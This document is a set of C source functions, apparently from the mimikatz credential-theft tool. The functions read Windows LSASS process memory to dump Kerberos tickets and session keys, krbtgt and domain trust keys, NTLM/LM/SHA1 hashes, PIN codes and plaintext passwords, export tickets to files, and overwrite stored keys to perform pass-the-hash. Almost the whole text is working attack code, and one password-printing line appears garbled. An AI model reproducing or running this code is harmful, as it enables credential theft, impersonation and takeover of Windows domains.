void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL encodedTicketToo) { kprintf(L"\n\t Start/End/MaxRenew: "); kull_m_string_displayLocalFileTime(&ticket->StartTime); kprintf(L" ; "); kull_m_string_displayLocalFileTime(&ticket->EndTime); kprintf(L" ; "); kull_m_string_displayLocalFileTime(&ticket->RenewUntil); kuhl_m_kerberos_ticket_displayExternalName(L"\n\t Service Name ", ticket->ServiceName, &ticket->DomainName); kuhl_m_kerberos_ticket_displayExternalName(L"\n\t Target Name ", ticket->TargetName, &ticket->TargetDomainName); kuhl_m_kerberos_ticket_displayExternalName(L"\n\t Client Name ", ticket->ClientName, &ticket->AltTargetDomainName); if(ticket->Description.Buffer) kprintf(L" ( %wZ )", &ticket->Description); kprintf(L"\n\t Flags %08x : ", ticket->TicketFlags); kuhl_m_kerberos_ticket_displayFlags(ticket->TicketFlags); kprintf(L"\n\t Session Key : 0x%08x - %s", ticket->KeyType, kuhl_m_kerberos_ticket_etype(ticket->KeyType)); if(ticket->Key.Value) { kprintf(L"\n\t "); kull_m_string_wprintf_hex(ticket->Key.Value, ticket->Key.Length, 0); } kprintf(L"\n\t Ticket : 0x%08x - %s ; kvno = %u", ticket->TicketEncType, kuhl_m_kerberos_ticket_etype(ticket->TicketEncType), ticket->TicketKvno); if(encodedTicketToo) { kprintf(L"\n\t "); if(ticket->Ticket.Value) kull_m_string_wprintf_hex(ticket->Ticket.Value, ticket->Ticket.Length, 1); else PRINT_ERROR_AUTO(L"NULL Ticket Value !"); } else kprintf(L"\t[...]"); }
void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile) { PVOID pStruct, pRef = tickets; KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS data = {&pStruct, &hBuffer}, aTicket = {NULL, &hBuffer}, aLsassBuffer = {tickets, pData->cLsass->hLsassMem}; DWORD nbTickets = 0; PKIWI_KERBEROS_TICKET pKiwiTicket; PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred; BOOL isNormalSessionKey; wchar_t * filename; if(aTicket.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structTicketSize)) { if(kull_m_memory_copy(&data, &aLsassBuffer, sizeof(PVOID))) { data.address = pStruct; data.hMemory = pData->cLsass->hLsassMem; while(data.address != pRef) { if(kull_m_memory_copy(&aTicket, &data, kerbHelper[KerbOffsetIndex].structTicketSize)) { kprintf(L"\n\t [%08x]", nbTickets); if(pKiwiTicket = kuhl_m_sekurlsa_kerberos_createTicket((LPBYTE) aTicket.address, pData->cLsass->hLsassMem)) { isNormalSessionKey = (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) || (pKiwiTicket->Key.Length < (ULONG) FIELD_OFFSET(LSAISO_DATA_BLOB, data)); kuhl_m_kerberos_ticket_display(pKiwiTicket, isNormalSessionKey, FALSE); if(isFile) if(filename = kuhl_m_sekurlsa_kerberos_generateFileName(pData->LogonId, grp, nbTickets, pKiwiTicket, MIMIKATZ_KERBEROS_EXT)) { if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket, FALSE)) { if(kull_m_file_writeData(filename, App_KrbCred, kull_m_asn1_getSize(App_KrbCred))) kprintf(L"\n\t * Saved to file %s !", filename); else PRINT_ERROR_AUTO(L"kull_m_file_writeData"); LocalFree(App_KrbCred); } LocalFree(filename); } if(!isNormalSessionKey) { kprintf(L"\n\t LSA Session Key : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType)); kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) pKiwiTicket->Key.Value); } kuhl_m_kerberos_ticket_freeTicket(pKiwiTicket); } data.address = ((PLIST_ENTRY) (aTicket.address))->Flink; } else break; nbTickets++; } } LocalFree(aTicket.address); } }
void kuhl_m_sekurlsa_trust_domainkeys(struct _KDC_DOMAIN_KEYS_INFO * keysInfo, PCWSTR prefix, BOOL incoming, PCUNICODE_STRING domain) { KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLsass = {keysInfo->keys, cLsass.hLsassMem}, aData = {NULL, &hBuffer}; DWORD i; PKDC_DOMAIN_KEYS domainKeys; if((keysInfo->keysSize && keysInfo->keys) || (keysInfo->password.Length && keysInfo->password.Buffer)) { kprintf(L"\n [%s] ", prefix); kprintf(incoming ? L"-> %wZ\n" : L"%wZ ->\n", domain); if(kull_m_string_getUnicodeString(&keysInfo->password, cLsass.hLsassMem)) { kprintf(L"\tfrom: "); if(kull_m_string_suspectUnicodeString(&keysInfo->password)) kprintf(L"%wZ", &keysInfo->password); else kull_m_string_wprintf_hex(keysInfo->password.Buffer, keysInfo->password.Length, 1); LocalFree(keysInfo->password.Buffer); } kprintf(L"\n"); if(keysInfo->keysSize && keysInfo->keys) { if(domainKeys = (PKDC_DOMAIN_KEYS) LocalAlloc(LPTR, keysInfo->keysSize)) { aData.address = domainKeys; if(kull_m_memory_copy(&aData, &aLsass, keysInfo->keysSize)) { for(i = 0; i < domainKeys->nbKeys; i++) { kprintf(L"\t* %s : ", kuhl_m_kerberos_ticket_etype(domainKeys->keys[i].type)); kull_m_string_wprintf_hex((PBYTE) domainKeys + domainKeys->keys[i].offset, domainKeys->keys[i].size, 0); kprintf(L"\n"); } } LocalFree(domainKeys); } } } }
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData) { PSEKURLSA_PTH_DATA pthData = (PSEKURLSA_PTH_DATA) pOptionalData; DWORD i, nbHash; BYTE ntlmHash[LM_NTLM_HASH_LENGTH], aes128key[AES_128_KEY_LENGTH], aes256key[AES_256_KEY_LENGTH]; BOOL isNtlm = FALSE, isAes128 = FALSE, isAes256 = FALSE; UNICODE_STRING nullPasswd = {0, 0, NULL}; KULL_M_MEMORY_ADDRESS aLocalKeyMemory = {NULL, Localkerbsession.hMemory}, aLocalHashMemory = {NULL, Localkerbsession.hMemory}, aLocalNTLMMemory = {NULL, Localkerbsession.hMemory}, aLocalPasswdMemory = {&nullPasswd, Localkerbsession.hMemory}, aRemotePasswdMemory = {(PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password), RemoteLocalKerbSession.hMemory}; PKERB_HASHPASSWORD_GENERIC pHash; PBYTE baseCheck; PCWCHAR resultok; SIZE_T offset; if(RemoteLocalKerbSession.address = *(PVOID *) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList)) { if(aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize)) { if(kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize)) { if(nbHash = ((DWORD *)(aLocalKeyMemory.address))[1]) { if(isNtlm = (pthData->NtlmHash != NULL)) { RtlCopyMemory(ntlmHash, pthData->NtlmHash, LM_NTLM_HASH_LENGTH); if(pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_BUILD_VISTA) (*pData->lsassLocalHelper->pLsaProtectMemory)(ntlmHash, LM_NTLM_HASH_LENGTH); } if(pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_BUILD_7) { if(isAes128 = (pthData->Aes128Key != NULL)) { RtlCopyMemory(aes128key, pthData->Aes128Key, AES_128_KEY_LENGTH); (*pData->lsassLocalHelper->pLsaProtectMemory)(aes128key, AES_128_KEY_LENGTH); } if(isAes256 = (pthData->Aes256Key != NULL)) { RtlCopyMemory(aes256key, pthData->Aes256Key, AES_256_KEY_LENGTH); (*pData->lsassLocalHelper->pLsaProtectMemory)(aes256key, AES_256_KEY_LENGTH); } } RemoteLocalKerbSession.address = baseCheck = (PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize; i = nbHash * (DWORD) kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize; if(aLocalHashMemory.address = LocalAlloc(LPTR, i)) { if(kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i)) { kprintf(L"data copy @ %p", RemoteLocalKerbSession.address, nbHash); for(i = 0, pthData->isReplaceOk = TRUE; (i < nbHash) && pthData->isReplaceOk; i++) { offset = i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric; pHash = (PKERB_HASHPASSWORD_GENERIC) ((PBYTE) aLocalHashMemory.address + offset); kprintf(L"\n \\_ %s ", kuhl_m_kerberos_ticket_etype(pHash->Type)); RemoteLocalKerbSession.address = pHash->Checksump; resultok = L"OK"; if(isNtlm && ((pHash->Type != KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) && (pHash->Type != KERB_ETYPE_AES256_CTS_HMAC_SHA1_96)) && (pHash->Size == LM_NTLM_HASH_LENGTH)) { aLocalNTLMMemory.address = ntlmHash; offset = LM_NTLM_HASH_LENGTH; } else if(isAes128 && (pHash->Type == KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) && (pHash->Size == AES_128_KEY_LENGTH)) { aLocalNTLMMemory.address = aes128key; offset = AES_128_KEY_LENGTH; } else if(isAes256 && (pHash->Type == KERB_ETYPE_AES256_CTS_HMAC_SHA1_96) && (pHash->Size == AES_256_KEY_LENGTH)) { aLocalNTLMMemory.address = aes256key; offset = AES_256_KEY_LENGTH; } else { aLocalNTLMMemory.address = pHash; RemoteLocalKerbSession.address = baseCheck + offset; offset = FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Checksump); resultok = kuhl_m_kerberos_ticket_etype(KERB_ETYPE_NULL); pHash->Type = KERB_ETYPE_NULL; pHash->Size = 0; kprintf(L"-> "); } if(pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, offset)) kprintf(L"%s", resultok); else PRINT_ERROR_AUTO(L"kull_m_memory_copy"); } if(pthData->isReplaceOk && ((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetCreds))->Password.Buffer) { kprintf(L"\n \\_ *Password replace -> "); if(pthData->isReplaceOk = kull_m_memory_copy(&aRemotePasswdMemory, &aLocalPasswdMemory, sizeof(UNICODE_STRING))) kprintf(L"null", aRemotePasswdMemory.address); else PRINT_ERROR_AUTO(L"kull_m_memory_copy"); } } LocalFree(aLocalHashMemory.address); } } } LocalFree(aLocalKeyMemory.address); } } }
void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix) { DWORD sizeForCreds, i; KIWI_KRBTGT_CREDENTIALS_6 tmpCred6, *creds6; KIWI_KRBTGT_CREDENTIALS_5 tmpCred5, *creds5; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLsass = {addr, cLsass.hLsassMem}, aLocal = {&tmpCred6, &hLocalMemory}; if(addr) { kprintf(L"\n%s krbtgt: ", prefix); if(cLsass.osContext.MajorVersion < 6) { aLocal.address = &tmpCred5; if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(KIWI_KRBTGT_CREDENTIALS_5) - sizeof(KIWI_KRBTGT_CREDENTIAL_5))) { sizeForCreds = sizeof(KIWI_KRBTGT_CREDENTIALS_5) + (tmpCred5.cbCred - 1) * sizeof(KIWI_KRBTGT_CREDENTIAL_5); if(creds5 = (PKIWI_KRBTGT_CREDENTIALS_5) LocalAlloc(LPTR, sizeForCreds)) { aLocal.address = creds5; if(kull_m_memory_copy(&aLocal, &aLsass, sizeForCreds)) { kprintf(L"%u credentials\n", creds5->cbCred); for(i = 0; i < creds5->cbCred; i++) { kprintf(L"\t * %s : ", kuhl_m_kerberos_ticket_etype(PtrToLong(creds5->credentials[i].type))); aLsass.address = creds5->credentials[i].key; if(aLocal.address = LocalAlloc(LPTR, PtrToUlong(creds5->credentials[i].size))) { if(kull_m_memory_copy(&aLocal, &aLsass, PtrToUlong(creds5->credentials[i].size))) kull_m_string_wprintf_hex(aLocal.address, PtrToUlong(creds5->credentials[i].size), 0); LocalFree(aLocal.address); } kprintf(L"\n"); } } LocalFree(creds5); } } } else { aLocal.address = &tmpCred6; if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(KIWI_KRBTGT_CREDENTIALS_6) - sizeof(KIWI_KRBTGT_CREDENTIAL_6))) { sizeForCreds = sizeof(KIWI_KRBTGT_CREDENTIALS_6) + (tmpCred6.cbCred - 1) * sizeof(KIWI_KRBTGT_CREDENTIAL_6); if(creds6 = (PKIWI_KRBTGT_CREDENTIALS_6) LocalAlloc(LPTR, sizeForCreds)) { aLocal.address = creds6; if(kull_m_memory_copy(&aLocal, &aLsass, sizeForCreds)) { kprintf(L"%u credentials\n", creds6->cbCred); for(i = 0; i < creds6->cbCred; i++) { kprintf(L"\t * %s : ", kuhl_m_kerberos_ticket_etype(PtrToLong(creds6->credentials[i].type))); aLsass.address = creds6->credentials[i].key; if(aLocal.address = LocalAlloc(LPTR, PtrToUlong(creds6->credentials[i].size))) { if(kull_m_memory_copy(&aLocal, &aLsass, PtrToUlong(creds6->credentials[i].size))) kull_m_string_wprintf_hex(aLocal.address, PtrToUlong(creds6->credentials[i].size), 0); LocalFree(aLocal.address); } kprintf(L"\n"); } } LocalFree(creds6); } } } } }
NTSTATUS kuhl_m_kerberos_list(int argc, wchar_t * argv[]) { NTSTATUS status, packageStatus; KERB_QUERY_TKT_CACHE_REQUEST kerbCacheRequest = {KerbQueryTicketCacheExMessage, {0, 0}}; PKERB_QUERY_TKT_CACHE_EX_RESPONSE pKerbCacheResponse; PKERB_RETRIEVE_TKT_REQUEST pKerbRetrieveRequest; PKERB_RETRIEVE_TKT_RESPONSE pKerbRetrieveResponse; DWORD szData, i; wchar_t * filename; BOOL export = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL); status = LsaCallKerberosPackage(&kerbCacheRequest, sizeof(KERB_QUERY_TKT_CACHE_REQUEST), (PVOID *) &pKerbCacheResponse, &szData, &packageStatus); if(NT_SUCCESS(status)) { if(NT_SUCCESS(packageStatus)) { for(i = 0; i < pKerbCacheResponse->CountOfTickets; i++) { kprintf(L"\n[%08x] - 0x%08x - %s", i, pKerbCacheResponse->Tickets[i].EncryptionType, kuhl_m_kerberos_ticket_etype(pKerbCacheResponse->Tickets[i].EncryptionType)); kprintf(L"\n Start/End/MaxRenew: "); kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].StartTime); kprintf(L" ; "); kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].EndTime); kprintf(L" ; "); kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].RenewTime); kprintf(L"\n Server Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ServerName, &pKerbCacheResponse->Tickets[i].ServerRealm); kprintf(L"\n Client Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ClientName, &pKerbCacheResponse->Tickets[i].ClientRealm); kprintf(L"\n Flags %08x : ", pKerbCacheResponse->Tickets[i].TicketFlags); kuhl_m_kerberos_ticket_displayFlags(pKerbCacheResponse->Tickets[i].TicketFlags); if(export) { szData = sizeof(KERB_RETRIEVE_TKT_REQUEST) + pKerbCacheResponse->Tickets[i].ServerName.MaximumLength; if(pKerbRetrieveRequest = (PKERB_RETRIEVE_TKT_REQUEST) LocalAlloc(LPTR, szData)) // LPTR implicates KERB_ETYPE_NULL { pKerbRetrieveRequest->MessageType = KerbRetrieveEncodedTicketMessage; pKerbRetrieveRequest->CacheOptions = /*KERB_RETRIEVE_TICKET_USE_CACHE_ONLY | */KERB_RETRIEVE_TICKET_AS_KERB_CRED; pKerbRetrieveRequest->TicketFlags = pKerbCacheResponse->Tickets[i].TicketFlags; pKerbRetrieveRequest->TargetName = pKerbCacheResponse->Tickets[i].ServerName; pKerbRetrieveRequest->TargetName.Buffer = (PWSTR) ((PBYTE) pKerbRetrieveRequest + sizeof(KERB_RETRIEVE_TKT_REQUEST)); RtlCopyMemory(pKerbRetrieveRequest->TargetName.Buffer, pKerbCacheResponse->Tickets[i].ServerName.Buffer, pKerbRetrieveRequest->TargetName.MaximumLength); status = LsaCallKerberosPackage(pKerbRetrieveRequest, szData, (PVOID *) &pKerbRetrieveResponse, &szData, &packageStatus); if(NT_SUCCESS(status)) { if(NT_SUCCESS(packageStatus)) { if(filename = kuhl_m_kerberos_generateFileName(i, &pKerbCacheResponse->Tickets[i], MIMIKATZ_KERBEROS_EXT)) { if(kull_m_file_writeData(filename, pKerbRetrieveResponse->Ticket.EncodedTicket, pKerbRetrieveResponse->Ticket.EncodedTicketSize)) kprintf(L"\n * Saved to file : %s", filename); LocalFree(filename); } LsaFreeReturnBuffer(pKerbRetrieveResponse); } else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbRetrieveEncodedTicketMessage / Package : %08x\n", packageStatus); } else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbRetrieveEncodedTicketMessage : %08x\n", status); LocalFree(pKerbRetrieveRequest); } } kprintf(L"\n"); } LsaFreeReturnBuffer(pKerbCacheResponse); } else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbQueryTicketCacheEx2Message / Package : %08x\n", packageStatus); }
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags) { PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL; PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds; PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds; PKERB_HASHPASSWORD_6 pHashPassword; UNICODE_STRING buffer; PVOID base; DWORD type, i; if(mesCreds) { if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL) { type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK; credentials = (PUNICODE_STRING) mesCreds; if(credentials->Buffer) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length); switch(type) { case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY: pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer; kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE); kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE); dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName); if(pPrimaryCreds->isLmOwfPassword) { dprintf("\n\t * LM : "); kull_m_string_dprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0); } if(pPrimaryCreds->isNtOwfPassword) { dprintf("\n\t * NTLM : "); kull_m_string_dprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0); } if(pPrimaryCreds->isShaOwPassword) { dprintf("\n\t * SHA1 : "); kull_m_string_dprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0); } break; case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY: pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer; base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY); for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++) kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base); break; default: dprintf("\n\t * Raw data : "); kull_m_string_dprintf_hex(credentials->Buffer, credentials->Length, 1); } } } else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE) { if(mesCreds->UserName.Buffer) { if(kull_m_string_getDbgUnicodeString(&mesCreds->UserName)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(mesCreds->UserName.Buffer, mesCreds->UserName.MaximumLength); dprintf("\n\t * PIN code : %wZ", &mesCreds->UserName); LocalFree(mesCreds->UserName.Buffer); } } } else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST) { pHashPassword = (PKERB_HASHPASSWORD_6) mesCreds; dprintf("\n\t\t%s : ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type)); if(buffer.Length = buffer.MaximumLength = (USHORT) pHashPassword->Size) { buffer.Buffer = (PWSTR) pHashPassword->Checksump; if(kull_m_string_getDbgUnicodeString(&buffer)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer.Buffer, buffer.MaximumLength); kull_m_string_dprintf_hex(buffer.Buffer, buffer.Length, 0); LocalFree(buffer.Buffer); } } else dprintf("<no size, buffer is incorrect>"); } else { if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer) { if(kull_m_string_getDbgUnicodeString(&mesCreds->UserName) && kull_m_string_suspectUnicodeString(&mesCreds->UserName)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN)) username = &mesCreds->UserName; else domain = &mesCreds->UserName; } if(kull_m_string_getDbgUnicodeString(&mesCreds->Domaine) && kull_m_string_suspectUnicodeString(&mesCreds->Domaine)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN)) domain = &mesCreds->Domaine; else username = &mesCreds->Domaine; } if(kull_m_string_getDbgUnicodeString(&mesCreds->Password) /*&& !kull_m_string_suspectUnicodeString(&mesCreds->Password)*/) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(mesCreds->Password.Buffer, mesCreds->Password.MaximumLength); password = &mesCreds->Password; } if(password || !(flags & KUHL_SEKURLSA_CREDS_DISPLAY_WPASSONLY)) { dprintf((flags & KUHL_SEKURLSA_CREDS_DISPLAY_LINE) ? "%wZ\t%wZ\t" : "\n\t * Username : %wZ" "\n\t * Domain : %wZ" "\n\t * Password : "******"%.*S", password->Length / sizeof(wchar_t), password->Buffer); else dprintf("%wZ", password ? password : &uNull); } else kull_m_string_dprintf_hex(password->Buffer, password->Length, 1); } LocalFree(mesCreds->UserName.Buffer); LocalFree(mesCreds->Domaine.Buffer); LocalFree(mesCreds->Password.Buffer); } } if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NEWLINE) dprintf("\n"); } else dprintf("LUID KO\n"); }
NTSTATUS kuhl_m_kerberos_list_tickets(PKERB_CALLBACK_CTX callbackCtx, BOOL bExport) { NTSTATUS status, packageStatus; KERB_QUERY_TKT_CACHE_REQUEST kerbCacheRequest = {KerbQueryTicketCacheExMessage, {0, 0}}; PKERB_QUERY_TKT_CACHE_EX_RESPONSE pKerbCacheResponse; PKERB_RETRIEVE_TKT_REQUEST pKerbRetrieveRequest = NULL; PKERB_RETRIEVE_TKT_RESPONSE pKerbRetrieveResponse = NULL; DWORD szData, i; status = LsaCallKerberosPackage(&kerbCacheRequest, sizeof(KERB_QUERY_TKT_CACHE_REQUEST), (PVOID *) &pKerbCacheResponse, &szData, &packageStatus); if(NT_SUCCESS(status)) { if(NT_SUCCESS(packageStatus)) { for(i = 0; i < pKerbCacheResponse->CountOfTickets; i++) { kprintf(L"\n[%08x] - 0x%08x - %s", i, pKerbCacheResponse->Tickets[i].EncryptionType, kuhl_m_kerberos_ticket_etype(pKerbCacheResponse->Tickets[i].EncryptionType)); kprintf(L"\n Start/End/MaxRenew: "); kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].StartTime); kprintf(L" ; "); kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].EndTime); kprintf(L" ; "); kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].RenewTime); kprintf(L"\n Server Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ServerName, &pKerbCacheResponse->Tickets[i].ServerRealm); kprintf(L"\n Client Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ClientName, &pKerbCacheResponse->Tickets[i].ClientRealm); kprintf(L"\n Flags %08x : ", pKerbCacheResponse->Tickets[i].TicketFlags); kuhl_m_kerberos_ticket_displayFlags(pKerbCacheResponse->Tickets[i].TicketFlags); if (bExport) { szData = sizeof(KERB_RETRIEVE_TKT_REQUEST)+pKerbCacheResponse->Tickets[i].ServerName.MaximumLength; if (pKerbRetrieveRequest = (PKERB_RETRIEVE_TKT_REQUEST)LocalAlloc(LPTR, szData)) // LPTR implicates KERB_ETYPE_NULL { pKerbRetrieveRequest->MessageType = KerbRetrieveEncodedTicketMessage; pKerbRetrieveRequest->CacheOptions = /*KERB_RETRIEVE_TICKET_USE_CACHE_ONLY | */KERB_RETRIEVE_TICKET_AS_KERB_CRED; pKerbRetrieveRequest->TicketFlags = pKerbCacheResponse->Tickets[i].TicketFlags; pKerbRetrieveRequest->TargetName = pKerbCacheResponse->Tickets[i].ServerName; pKerbRetrieveRequest->TargetName.Buffer = (PWSTR)((PBYTE)pKerbRetrieveRequest + sizeof(KERB_RETRIEVE_TKT_REQUEST)); RtlCopyMemory(pKerbRetrieveRequest->TargetName.Buffer, pKerbCacheResponse->Tickets[i].ServerName.Buffer, pKerbRetrieveRequest->TargetName.MaximumLength); status = LsaCallKerberosPackage(pKerbRetrieveRequest, szData, (PVOID *)&pKerbRetrieveResponse, &szData, &packageStatus); } } if (callbackCtx && callbackCtx->pTicketHandler) callbackCtx->pTicketHandler(callbackCtx->lpContext, &pKerbCacheResponse->Tickets[i], pKerbRetrieveResponse ? &pKerbRetrieveResponse->Ticket : NULL); if (pKerbRetrieveRequest) { LocalFree(pKerbRetrieveRequest); pKerbRetrieveRequest = NULL; } if (pKerbRetrieveResponse) { LsaFreeReturnBuffer(pKerbRetrieveResponse); pKerbRetrieveResponse = NULL; } kprintf(L"\n"); } LsaFreeReturnBuffer(pKerbCacheResponse); } else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbQueryTicketCacheEx2Message / Package : %08x\n", packageStatus); } else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbQueryTicketCacheEx2Message : %08x\n", status); return STATUS_SUCCESS; }